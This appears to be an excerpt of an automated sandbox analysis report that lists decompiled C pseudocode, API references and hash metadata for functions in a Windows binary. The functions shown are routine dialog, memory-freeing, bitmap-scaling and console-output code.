					 *0xf26124(_t187, 0, _t164, _t201, _v2324, _v2352.left,  !(GetWindowLongW(_t187, 0xfffffff0) >> 0xa) & 0x00000002 | 0x00000204);
					GetWindowRect(_t187,  &_v2368);
					_t157 = _v2393;
					goto L15;
				} else {
					_t202 = 0xef1044;
					do {
						if( *_t202 > 0) {
							_t9 =  &(_t202[1]); // 0xee8428
							_t151 = E00EDAF20( &_v2288,  *_t9, _t96);
							_t208 = _t208 + 0xc;
							if(_t151 == 0) {
								_t12 =  &(_t202[1]); // 0xee8428
								if(E00EC3F18(_t156, _t203, _t202,  *_t12,  &_v2048, 0x400) != 0) {
									SetDlgItemTextW(_t187,  *_t202,  &_v2048);
								}
							}
							_t96 = _v2368.top;
						}
						_t156 = _t156 + 1;
						_t202 =  &(_t202[3]);
						_t214 = _t156 -  *0xef14e4; // 0x63
					} while (_t214 < 0);
					goto L8;
				}
			}



















































                                                                                                                0x00ec471b
                                                                                                                0x00ec4725
                                                                                                                0x00ec4729
                                                                                                                0x00ec472e
                                                                                                                0x00ec4740
                                                                                                                0x00ec474a
                                                                                                                0x00ec474f
                                                                                                                0x00ec4756
                                                                                                                0x00ec4759
                                                                                                                0x00ec475d
                                                                                                                0x00ec4763
                                                                                                                0x00ec47c0
                                                                                                                0x00ec47d8
                                                                                                                0x00ec47e0
                                                                                                                0x00ec47e4
                                                                                                                0x00ec47f0
                                                                                                                0x00ec4802
                                                                                                                0x00ec4809
                                                                                                                0x00ec480d
                                                                                                                0x00ec4810
                                                                                                                0x00ec4818
                                                                                                                0x00ec481e
                                                                                                                0x00ec4824
                                                                                                                0x00ec48c7
                                                                                                                0x00ec48c7
                                                                                                                0x00ec48cf
                                                                                                                0x00ec4900
                                                                                                                0x00ec4900
                                                                                                                0x00ec4906
                                                                                                                0x00ec4911
                                                                                                                0x00ec4913
                                                                                                                0x00ec4919
                                                                                                                0x00ec491b
                                                                                                                0x00ec4921
                                                                                                                0x00ec49d3
                                                                                                                0x00ec49d3
                                                                                                                0x00ec49d3
                                                                                                                0x00ec4927
                                                                                                                0x00ec49c1
                                                                                                                0x00ec492e
                                                                                                                0x00ec4934
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00ec4940
                                                                                                                0x00ec494a
                                                                                                                0x00ec495f
                                                                                                                0x00ec4964
                                                                                                                0x00ec4967
                                                                                                                0x00ec497d
                                                                                                                0x00ec4985
                                                                                                                0x00ec4987
                                                                                                                0x00ec4988
                                                                                                                0x00ec4990
                                                                                                                0x00ec49a2
                                                                                                                0x00ec49a9
                                                                                                                0x00ec49b2
                                                                                                                0x00ec49b8
                                                                                                                0x00ec49ba
                                                                                                                0x00ec49be
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00ec49c0
                                                                                                                0x00ec49c0
                                                                                                                0x00ec49c0
                                                                                                                0x00000000
                                                                                                                0x00ec49c1
                                                                                                                0x00ec4832
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00ec483f
                                                                                                                0x00ec4842
                                                                                                                0x00ec484b
                                                                                                                0x00ec4850
                                                                                                                0x00ec4856
                                                                                                                0x00ec485a
                                                                                                                0x00ec485b
                                                                                                                0x00ec4861
                                                                                                                0x00ec486b
                                                                                                                0x00ec4872
                                                                                                                0x00ec487b
                                                                                                                0x00ec487f
                                                                                                                0x00ec4883
                                                                                                                0x00ec4885
                                                                                                                0x00ec4885
                                                                                                                0x00ec4889
                                                                                                                0x00ec488b
                                                                                                                0x00ec488b
                                                                                                                0x00ec48b1
                                                                                                                0x00ec48bd
                                                                                                                0x00ec48c3
                                                                                                                0x00000000
                                                                                                                0x00ec4765
                                                                                                                0x00ec4765
                                                                                                                0x00ec476a
                                                                                                                0x00ec476d
                                                                                                                0x00ec4770
                                                                                                                0x00ec4778
                                                                                                                0x00ec477d
                                                                                                                0x00ec4782
                                                                                                                0x00ec4793
                                                                                                                0x00ec479d
                                                                                                                0x00ec47aa
                                                                                                                0x00ec47aa
                                                                                                                0x00ec479d
                                                                                                                0x00ec47b0
                                                                                                                0x00ec47b0
                                                                                                                0x00ec47b4
                                                                                                                0x00ec47b5
                                                                                                                0x00ec47b8
                                                                                                                0x00ec47b8
                                                                                                                0x00000000
                                                                                                                0x00ec476a

                                                                                                                APIs
                                                                                                                • _swprintf.LIBCMT ref: 00EC4729
                                                                                                                  • Part of subcall function 00EC37E6: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00EC37F9
                                                                                                                  • Part of subcall function 00EC799C: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,EG,?,00000000,00000000,?,?,?,00EC4745,?,?,00000050), ref: 00EC79B9
                                                                                                                • _strlen.LIBCMT ref: 00EC474A
                                                                                                                • SetDlgItemTextW.USER32(?,00EF1044,?), ref: 00EC47AA
                                                                                                                • GetWindowRect.USER32(?,?), ref: 00EC47E4
                                                                                                                • GetClientRect.USER32(?,?), ref: 00EC47F0
                                                                                                                • GetWindowLongW.USER32(?,000000F0), ref: 00EC4890
                                                                                                                • GetWindowRect.USER32(?,?), ref: 00EC48BD
                                                                                                                • SetWindowTextW.USER32(?,?), ref: 00EC4900
                                                                                                                • GetSystemMetrics.USER32(00000008), ref: 00EC4908
                                                                                                                • GetWindow.USER32(?,00000005), ref: 00EC4913
                                                                                                                • GetWindowRect.USER32(00000000,?), ref: 00EC4940
                                                                                                                • GetWindow.USER32(00000000,00000002), ref: 00EC49B2
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.504263666.0000000000EC1000.00000020.00020000.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.504220943.0000000000EC0000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505107406.0000000000EE7000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505236670.0000000000EF1000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505296900.0000000000EF7000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505341126.0000000000F06000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505375670.0000000000F25000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505408633.0000000000F26000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: Window$Rect$Text$ByteCharClientItemLongMetricsMultiSystemWide__vswprintf_c_l_strlen_swprintf
                                                                                                                • String ID: Ht>*$$%s:$CAPTION$d
                                                                                                                • API String ID: 2407758923-3118217341
                                                                                                                • Opcode ID: e2fe1b3926301ba349d0c490429f8ae1f4ff6cbea4ebebc9ea583db59bac2adf
                                                                                                                • Instruction ID: ac03771775a197c0d6b6a8a31ef3f90b0af235c1069a918395f61fa1932e07e4
                                                                                                                • Opcode Fuzzy Hash: e2fe1b3926301ba349d0c490429f8ae1f4ff6cbea4ebebc9ea583db59bac2adf
                                                                                                                • Instruction Fuzzy Hash: 2D8190B2508345AFD720DF68CE85F6BBBE9EBC8704F04591DF984E3291D631E9068B52
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00EE12D2, Relevance: 19.6, APIs: 13, Instructions: 114COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 100%
                                                                                                                			E00EE12D2(intOrPtr _a4) {
				intOrPtr _v8;
				intOrPtr _t25;
				intOrPtr* _t26;
				intOrPtr _t28;
				intOrPtr* _t29;
				intOrPtr* _t31;
				intOrPtr* _t45;
				intOrPtr* _t46;
				intOrPtr* _t47;
				intOrPtr* _t55;
				intOrPtr* _t70;
				intOrPtr _t74;

				_t74 = _a4;
				_t25 =  *((intOrPtr*)(_t74 + 0x88));
				if(_t25 != 0 && _t25 != 0xef1c40) {
					_t45 =  *((intOrPtr*)(_t74 + 0x7c));
					if(_t45 != 0 &&  *_t45 == 0) {
						_t46 =  *((intOrPtr*)(_t74 + 0x84));
						if(_t46 != 0 &&  *_t46 == 0) {
							E00EDD5AA(_t46);
							E00EE0EB1( *((intOrPtr*)(_t74 + 0x88)));
						}
						_t47 =  *((intOrPtr*)(_t74 + 0x80));
						if(_t47 != 0 &&  *_t47 == 0) {
							E00EDD5AA(_t47);
							E00EE0FAF( *((intOrPtr*)(_t74 + 0x88)));
						}
						E00EDD5AA( *((intOrPtr*)(_t74 + 0x7c)));
						E00EDD5AA( *((intOrPtr*)(_t74 + 0x88)));
					}
				}
				_t26 =  *((intOrPtr*)(_t74 + 0x8c));
				if(_t26 != 0 &&  *_t26 == 0) {
					E00EDD5AA( *((intOrPtr*)(_t74 + 0x90)) - 0xfe);
					E00EDD5AA( *((intOrPtr*)(_t74 + 0x94)) - 0x80);
					E00EDD5AA( *((intOrPtr*)(_t74 + 0x98)) - 0x80);
					E00EDD5AA( *((intOrPtr*)(_t74 + 0x8c)));
				}
				E00EE1445( *((intOrPtr*)(_t74 + 0x9c)));
				_t28 = 6;
				_t55 = _t74 + 0xa0;
				_v8 = _t28;
				_t70 = _t74 + 0x28;
				do {
					if( *((intOrPtr*)(_t70 - 8)) != 0xef1708) {
						_t31 =  *_t70;
						if(_t31 != 0 &&  *_t31 == 0) {
							E00EDD5AA(_t31);
							E00EDD5AA( *_t55);
						}
						_t28 = _v8;
					}
					if( *((intOrPtr*)(_t70 - 0xc)) != 0) {
						_t29 =  *((intOrPtr*)(_t70 - 4));
						if(_t29 != 0 &&  *_t29 == 0) {
							E00EDD5AA(_t29);
						}
						_t28 = _v8;
					}
					_t55 = _t55 + 4;
					_t70 = _t70 + 0x10;
					_t28 = _t28 - 1;
					_v8 = _t28;
				} while (_t28 != 0);
				return E00EDD5AA(_t74);
			}















                                                                                                                0x00ee12da
                                                                                                                0x00ee12de
                                                                                                                0x00ee12e6
                                                                                                                0x00ee12ef
                                                                                                                0x00ee12f4
                                                                                                                0x00ee12fb
                                                                                                                0x00ee1303
                                                                                                                0x00ee130b
                                                                                                                0x00ee1316
                                                                                                                0x00ee131c
                                                                                                                0x00ee131d
                                                                                                                0x00ee1325
                                                                                                                0x00ee132d
                                                                                                                0x00ee1338
                                                                                                                0x00ee133e
                                                                                                                0x00ee1342
                                                                                                                0x00ee134d
                                                                                                                0x00ee1353
                                                                                                                0x00ee12f4
                                                                                                                0x00ee1354
                                                                                                                0x00ee135c
                                                                                                                0x00ee136f
                                                                                                                0x00ee1382
                                                                                                                0x00ee1390
                                                                                                                0x00ee139b
                                                                                                                0x00ee13a0
                                                                                                                0x00ee13a9
                                                                                                                0x00ee13b1
                                                                                                                0x00ee13b2
                                                                                                                0x00ee13b8
                                                                                                                0x00ee13bb
                                                                                                                0x00ee13be
                                                                                                                0x00ee13c5
                                                                                                                0x00ee13c7
                                                                                                                0x00ee13cb
                                                                                                                0x00ee13d3
                                                                                                                0x00ee13da
                                                                                                                0x00ee13e0
                                                                                                                0x00ee13e1
                                                                                                                0x00ee13e1
                                                                                                                0x00ee13e8
                                                                                                                0x00ee13ea
                                                                                                                0x00ee13ef
                                                                                                                0x00ee13f7
                                                                                                                0x00ee13fc
                                                                                                                0x00ee13fd
                                                                                                                0x00ee13fd
                                                                                                                0x00ee1400
                                                                                                                0x00ee1403
                                                                                                                0x00ee1406
                                                                                                                0x00ee1409
                                                                                                                0x00ee1409
                                                                                                                0x00ee141b

                                                                                                                APIs
                                                                                                                • ___free_lconv_mon.LIBCMT ref: 00EE1316
                                                                                                                  • Part of subcall function 00EE0EB1: _free.LIBCMT ref: 00EE0ECE
                                                                                                                  • Part of subcall function 00EE0EB1: _free.LIBCMT ref: 00EE0EE0
                                                                                                                  • Part of subcall function 00EE0EB1: _free.LIBCMT ref: 00EE0EF2
                                                                                                                  • Part of subcall function 00EE0EB1: _free.LIBCMT ref: 00EE0F04
                                                                                                                  • Part of subcall function 00EE0EB1: _free.LIBCMT ref: 00EE0F16
                                                                                                                  • Part of subcall function 00EE0EB1: _free.LIBCMT ref: 00EE0F28
                                                                                                                  • Part of subcall function 00EE0EB1: _free.LIBCMT ref: 00EE0F3A
                                                                                                                  • Part of subcall function 00EE0EB1: _free.LIBCMT ref: 00EE0F4C
                                                                                                                  • Part of subcall function 00EE0EB1: _free.LIBCMT ref: 00EE0F5E
                                                                                                                  • Part of subcall function 00EE0EB1: _free.LIBCMT ref: 00EE0F70
                                                                                                                  • Part of subcall function 00EE0EB1: _free.LIBCMT ref: 00EE0F82
                                                                                                                  • Part of subcall function 00EE0EB1: _free.LIBCMT ref: 00EE0F94
                                                                                                                  • Part of subcall function 00EE0EB1: _free.LIBCMT ref: 00EE0FA6
                                                                                                                • _free.LIBCMT ref: 00EE130B
                                                                                                                  • Part of subcall function 00EDD5AA: RtlFreeHeap.NTDLL(00000000,00000000,?,00EE1046,?,00000000,?,00000000,?,00EE106D,?,00000007,?,?,00EE146A,?), ref: 00EDD5C0
                                                                                                                  • Part of subcall function 00EDD5AA: GetLastError.KERNEL32(?,?,00EE1046,?,00000000,?,00000000,?,00EE106D,?,00000007,?,?,00EE146A,?,?), ref: 00EDD5D2
                                                                                                                • _free.LIBCMT ref: 00EE132D
                                                                                                                • _free.LIBCMT ref: 00EE1342
                                                                                                                • _free.LIBCMT ref: 00EE134D
                                                                                                                • _free.LIBCMT ref: 00EE136F
                                                                                                                • _free.LIBCMT ref: 00EE1382
                                                                                                                • _free.LIBCMT ref: 00EE1390
                                                                                                                • _free.LIBCMT ref: 00EE139B
                                                                                                                • _free.LIBCMT ref: 00EE13D3
                                                                                                                • _free.LIBCMT ref: 00EE13DA
                                                                                                                • _free.LIBCMT ref: 00EE13F7
                                                                                                                • _free.LIBCMT ref: 00EE140F
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.504263666.0000000000EC1000.00000020.00020000.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.504220943.0000000000EC0000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505107406.0000000000EE7000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505236670.0000000000EF1000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505296900.0000000000EF7000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505341126.0000000000F06000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505375670.0000000000F25000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505408633.0000000000F26000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                                                                • String ID:
                                                                                                                • API String ID: 161543041-0
                                                                                                                • Opcode ID: cb79f0c44bc1b3e67b49194238e44528208beb52af905d771742a016de75596f
                                                                                                                • Instruction ID: 43ff5966c1b2c89ae8110f1e8409aa49fd88398bbf2a00e00b50011f7facbf79
                                                                                                                • Opcode Fuzzy Hash: cb79f0c44bc1b3e67b49194238e44528208beb52af905d771742a016de75596f
                                                                                                                • Instruction Fuzzy Hash: 8E31BE31608748DFDB30AA3AEC45B9AB3E8FF40318F11649AE058E7655DA32AD81CA10
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00ED1F2F, Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 79windowCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 91%
                                                                                                                			E00ED1F2F(void* __ecx, void* __edx, void* __eflags, void* __fp0, short _a24, struct HWND__* _a4124) {
				void _v0;
				intOrPtr _v4;
				intOrPtr _v12;
				struct HWND__* _t8;
				void* _t18;
				void* _t25;
				void* _t27;
				void* _t29;
				struct HWND__* _t32;
				struct HWND__* _t35;
				void* _t48;

				_t48 = __fp0;
				_t27 = __edx;
				E00ED3370();
				_t8 = E00ECF08A(__eflags);
				if(_t8 == 0) {
					L12:
					return _t8;
				}
				_t8 = GetWindow(_a4124, 5);
				_t32 = _t8;
				_t29 = 0;
				_t35 = _t32;
				if(_t32 == 0) {
					L11:
					goto L12;
				}
				while(_t29 < 0x200) {
					GetClassNameW(_t32,  &_a24, 0x800);
					if(E00EC7B7C( &_a24, L"STATIC") == 0 && (GetWindowLongW(_t32, 0xfffffff0) & 0x0000001f) == 0xe) {
						_t25 = SendMessageW(_t32, 0x173, 0, 0);
						if(_t25 != 0) {
							GetObjectW(_t25, 0x18,  &_v0);
							_t18 = E00ECF0EC(_v4);
							SendMessageW(_t32, 0x172, 0, E00ECF2DB(_t27, _t48, _t25, E00ECF0A9(_v12), _t18));
							 *0xf26020(_t25);
						}
					}
					_t8 = GetWindow(_t32, 2);
					_t32 = _t8;
					if(_t32 != _t35) {
						_t29 = _t29 + 1;
						if(_t32 != 0) {
							continue;
						}
					}
					break;
				}
				goto L11;
			}














                                                                                                                0x00ed1f2f
                                                                                                                0x00ed1f2f
                                                                                                                0x00ed1f34
                                                                                                                0x00ed1f39
                                                                                                                0x00ed1f40
                                                                                                                0x00ed2017
                                                                                                                0x00ed201d
                                                                                                                0x00ed201d
                                                                                                                0x00ed1f52
                                                                                                                0x00ed1f58
                                                                                                                0x00ed1f5a
                                                                                                                0x00ed1f5c
                                                                                                                0x00ed1f60
                                                                                                                0x00ed2014
                                                                                                                0x00000000
                                                                                                                0x00ed2016
                                                                                                                0x00ed1f67
                                                                                                                0x00ed1f7e
                                                                                                                0x00ed1f95
                                                                                                                0x00ed1fb7
                                                                                                                0x00ed1fbb
                                                                                                                0x00ed1fc5
                                                                                                                0x00ed1fcf
                                                                                                                0x00ed1fee
                                                                                                                0x00ed1ff5
                                                                                                                0x00ed1ff5
                                                                                                                0x00ed1fbb
                                                                                                                0x00ed1ffe
                                                                                                                0x00ed2004
                                                                                                                0x00ed2008
                                                                                                                0x00ed200a
                                                                                                                0x00ed200d
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00ed200d
                                                                                                                0x00000000
                                                                                                                0x00ed2008
                                                                                                                0x00000000

                                                                                                                APIs
                                                                                                                • GetWindow.USER32(?,00000005), ref: 00ED1F52
                                                                                                                • GetClassNameW.USER32(00000000,?,00000800), ref: 00ED1F7E
                                                                                                                  • Part of subcall function 00EC7B7C: CompareStringW.KERNEL32(00000400,00001001,00000000,000000FF,?,000000FF,00EC2E91,?,?,?,00EC2E3F,?,-00000002,?,00000000,?), ref: 00EC7B92
                                                                                                                • GetWindowLongW.USER32(00000000,000000F0), ref: 00ED1F9A
                                                                                                                • SendMessageW.USER32(00000000,00000173,00000000,00000000), ref: 00ED1FB1
                                                                                                                • GetObjectW.GDI32(00000000,00000018,?), ref: 00ED1FC5
                                                                                                                  • Part of subcall function 00ECF0EC: GetDC.USER32(00000000), ref: 00ECF0F8
                                                                                                                  • Part of subcall function 00ECF0EC: GetDeviceCaps.GDI32(00000000,0000005A), ref: 00ECF107
                                                                                                                  • Part of subcall function 00ECF0EC: ReleaseDC.USER32(00000000,00000000), ref: 00ECF115
                                                                                                                  • Part of subcall function 00ECF0A9: GetDC.USER32(00000000), ref: 00ECF0B5
                                                                                                                  • Part of subcall function 00ECF0A9: GetDeviceCaps.GDI32(00000000,00000058), ref: 00ECF0C4
                                                                                                                  • Part of subcall function 00ECF0A9: ReleaseDC.USER32(00000000,00000000), ref: 00ECF0D2
                                                                                                                • SendMessageW.USER32(00000000,00000172,00000000,00000000), ref: 00ED1FEE
                                                                                                                • GetWindow.USER32(00000000,00000002), ref: 00ED1FFE
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.504263666.0000000000EC1000.00000020.00020000.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.504220943.0000000000EC0000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505107406.0000000000EE7000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505236670.0000000000EF1000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505296900.0000000000EF7000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505341126.0000000000F06000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505375670.0000000000F25000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505408633.0000000000F26000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: Window$CapsDeviceMessageReleaseSend$ClassCompareLongNameObjectString
                                                                                                                • String ID: 9,$STATIC
                                                                                                                • API String ID: 3646925847-2551979683
                                                                                                                • Opcode ID: 27676e86be89598c48aa5d339c150e9c302ce3a0ffa3b312fcaa1c7b2e245331
                                                                                                                • Instruction ID: 33fb8ef5d776902ffde0ed05f1b917efd7c68bcc273e499464875aa16008edf4
                                                                                                                • Opcode Fuzzy Hash: 27676e86be89598c48aa5d339c150e9c302ce3a0ffa3b312fcaa1c7b2e245331
                                                                                                                • Instruction Fuzzy Hash: 281106326447547BE631AB709C4AFAF36ACEF58B04F001529FB81F51D2CB758D07A6A1
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00EDDF21, Relevance: 15.1, APIs: 10, Instructions: 54COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 100%
                                                                                                                			E00EDDF21(char _a4) {
				char _v8;

				_t26 = _a4;
				_t52 =  *_a4;
				if( *_a4 != 0xee9c20) {
					E00EDD5AA(_t52);
					_t26 = _a4;
				}
				E00EDD5AA( *((intOrPtr*)(_t26 + 0x3c)));
				E00EDD5AA( *((intOrPtr*)(_a4 + 0x30)));
				E00EDD5AA( *((intOrPtr*)(_a4 + 0x34)));
				E00EDD5AA( *((intOrPtr*)(_a4 + 0x38)));
				E00EDD5AA( *((intOrPtr*)(_a4 + 0x28)));
				E00EDD5AA( *((intOrPtr*)(_a4 + 0x2c)));
				E00EDD5AA( *((intOrPtr*)(_a4 + 0x40)));
				E00EDD5AA( *((intOrPtr*)(_a4 + 0x44)));
				E00EDD5AA( *((intOrPtr*)(_a4 + 0x360)));
				_v8 =  &_a4;
				E00EDDDD9(5,  &_v8);
				_v8 =  &_a4;
				return E00EDDE29(4,  &_v8);
			}




                                                                                                                0x00eddf27
                                                                                                                0x00eddf2a
                                                                                                                0x00eddf32
                                                                                                                0x00eddf35
                                                                                                                0x00eddf3a
                                                                                                                0x00eddf3d
                                                                                                                0x00eddf41
                                                                                                                0x00eddf4c
                                                                                                                0x00eddf57
                                                                                                                0x00eddf62
                                                                                                                0x00eddf6d
                                                                                                                0x00eddf78
                                                                                                                0x00eddf83
                                                                                                                0x00eddf8e
                                                                                                                0x00eddf9c
                                                                                                                0x00eddfa4
                                                                                                                0x00eddfad
                                                                                                                0x00eddfb5
                                                                                                                0x00eddfc9

                                                                                                                APIs
                                                                                                                • _free.LIBCMT ref: 00EDDF35
                                                                                                                  • Part of subcall function 00EDD5AA: RtlFreeHeap.NTDLL(00000000,00000000,?,00EE1046,?,00000000,?,00000000,?,00EE106D,?,00000007,?,?,00EE146A,?), ref: 00EDD5C0
                                                                                                                  • Part of subcall function 00EDD5AA: GetLastError.KERNEL32(?,?,00EE1046,?,00000000,?,00000000,?,00EE106D,?,00000007,?,?,00EE146A,?,?), ref: 00EDD5D2
                                                                                                                • _free.LIBCMT ref: 00EDDF41
                                                                                                                • _free.LIBCMT ref: 00EDDF4C
                                                                                                                • _free.LIBCMT ref: 00EDDF57
                                                                                                                • _free.LIBCMT ref: 00EDDF62
                                                                                                                • _free.LIBCMT ref: 00EDDF6D
                                                                                                                • _free.LIBCMT ref: 00EDDF78
                                                                                                                • _free.LIBCMT ref: 00EDDF83
                                                                                                                • _free.LIBCMT ref: 00EDDF8E
                                                                                                                • _free.LIBCMT ref: 00EDDF9C
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.504263666.0000000000EC1000.00000020.00020000.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.504220943.0000000000EC0000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505107406.0000000000EE7000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505236670.0000000000EF1000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505296900.0000000000EF7000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505341126.0000000000F06000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505375670.0000000000F25000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505408633.0000000000F26000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: _free$ErrorFreeHeapLast
                                                                                                                • String ID:
                                                                                                                • API String ID: 776569668-0
                                                                                                                • Opcode ID: b8c5e6c50fc73925f76b215044e72aa930420d19d585a214107e3c44dc77b3b3
                                                                                                                • Instruction ID: 7277ac637ee1d54b6901e41ce4843207fc94d189e4d6ee96aa86ace1bc9bec8d
                                                                                                                • Opcode Fuzzy Hash: b8c5e6c50fc73925f76b215044e72aa930420d19d585a214107e3c44dc77b3b3
                                                                                                                • Instruction Fuzzy Hash: 7711E976114118FFCB11FF54DC56CD93BA5EF44354B01A0A2F9086F22AD633EE529B40
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00EE3EBD, Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 152fileCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 73%
                                                                                                                			E00EE3EBD(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4, signed int _a8, signed char* _a12, intOrPtr _a16) {
				signed int _v8;
				signed char _v15;
				char _v16;
				void _v24;
				short _v28;
				char _v31;
				void _v32;
				char _v36;
				intOrPtr _v40;
				void* _v44;
				signed int _v48;
				signed char* _v52;
				long _v56;
				int _v60;
				signed int _t78;
				signed int _t80;
				int _t86;
				void* _t94;
				long _t97;
				void _t105;
				void* _t112;
				signed int _t116;
				signed int _t118;
				signed char _t123;
				signed char _t128;
				intOrPtr _t129;
				signed int _t131;
				signed char* _t133;
				intOrPtr* _t135;
				signed int _t136;
				void* _t137;

				_t78 =  *0xef1558; // 0xf529bb33
				_v8 = _t78 ^ _t136;
				_t80 = _a8;
				_t118 = _t80 >> 6;
				_t116 = (_t80 & 0x0000003f) * 0x30;
				_t133 = _a12;
				_v52 = _t133;
				_v48 = _t118;
				_v44 =  *((intOrPtr*)( *((intOrPtr*)(0xf25900 + _t118 * 4)) + _t116 + 0x18));
				_v40 = _a16 + _t133;
				_t86 = GetConsoleCP();
				_t135 = _a4;
				_v60 = _t86;
				 *_t135 = 0;
				 *((intOrPtr*)(_t135 + 4)) = 0;
				 *((intOrPtr*)(_t135 + 8)) = 0;
				while(_t133 < _v40) {
					_v28 = 0;
					_v31 =  *_t133;
					_t129 =  *((intOrPtr*)(0xf25900 + _v48 * 4));
					_t123 =  *(_t129 + _t116 + 0x2d);
					if((_t123 & 0x00000004) == 0) {
						if(( *(E00EDF000(_t116, _t129) + ( *_t133 & 0x000000ff) * 2) & 0x00008000) == 0) {
							_push(1);
							_push(_t133);
							goto L8;
						} else {
							if(_t133 >= _v40) {
								_t131 = _v48;
								 *((char*)( *((intOrPtr*)(0xf25900 + _t131 * 4)) + _t116 + 0x2e)) =  *_t133;
								 *( *((intOrPtr*)(0xf25900 + _t131 * 4)) + _t116 + 0x2d) =  *( *((intOrPtr*)(0xf25900 + _t131 * 4)) + _t116 + 0x2d) | 0x00000004;
								 *((intOrPtr*)(_t135 + 4)) =  *((intOrPtr*)(_t135 + 4)) + 1;
							} else {
								_t112 = E00EDDB3D( &_v28, _t133, 2);
								_t137 = _t137 + 0xc;
								if(_t112 != 0xffffffff) {
									_t133 =  &(_t133[1]);
									goto L9;
								}
							}
						}
					} else {
						_t128 = _t123 & 0x000000fb;
						_v16 =  *((intOrPtr*)(_t129 + _t116 + 0x2e));
						_push(2);
						_v15 = _t128;
						 *(_t129 + _t116 + 0x2d) = _t128;
						_push( &_v16);
						L8:
						_push( &_v28);
						_t94 = E00EDDB3D();
						_t137 = _t137 + 0xc;
						if(_t94 != 0xffffffff) {
							L9:
							_t133 =  &(_t133[1]);
							_t97 = WideCharToMultiByte(_v60, 0,  &_v28, 1,  &_v24, 5, 0, 0);
							_v56 = _t97;
							if(_t97 != 0) {
								_t45 =  &_v36; // 0xee4632
								if(WriteFile(_v44,  &_v24, _t97, _t45, 0) == 0) {
									L19:
									 *_t135 = GetLastError();
								} else {
									 *((intOrPtr*)(_t135 + 4)) =  *((intOrPtr*)(_t135 + 8)) - _v52 + _t133;
									if(_v36 >= _v56) {
										if(_v31 != 0xa) {
											goto L16;
										} else {
											_t105 = 0xd;
											_v32 = _t105;
											_t55 =  &_v36; // 0xee4632
											if(WriteFile(_v44,  &_v32, 1, _t55, 0) == 0) {
												goto L19;
											} else {
												if(_v36 >= 1) {
													 *((intOrPtr*)(_t135 + 8)) =  *((intOrPtr*)(_t135 + 8)) + 1;
													 *((intOrPtr*)(_t135 + 4)) =  *((intOrPtr*)(_t135 + 4)) + 1;
													goto L16;
												}
											}
										}
									}
								}
							}
						}
					}
					goto L20;
					L16:
				}
				L20:
				return E00ED3C6A(_v8 ^ _t136);
			}


































                                                                                                                0x00ee3ec5
                                                                                                                0x00ee3ecc
                                                                                                                0x00ee3ecf
                                                                                                                0x00ee3ed7
                                                                                                                0x00ee3edb
                                                                                                                0x00ee3ee7
                                                                                                                0x00ee3eea
                                                                                                                0x00ee3eed
                                                                                                                0x00ee3ef4
                                                                                                                0x00ee3efc
                                                                                                                0x00ee3eff
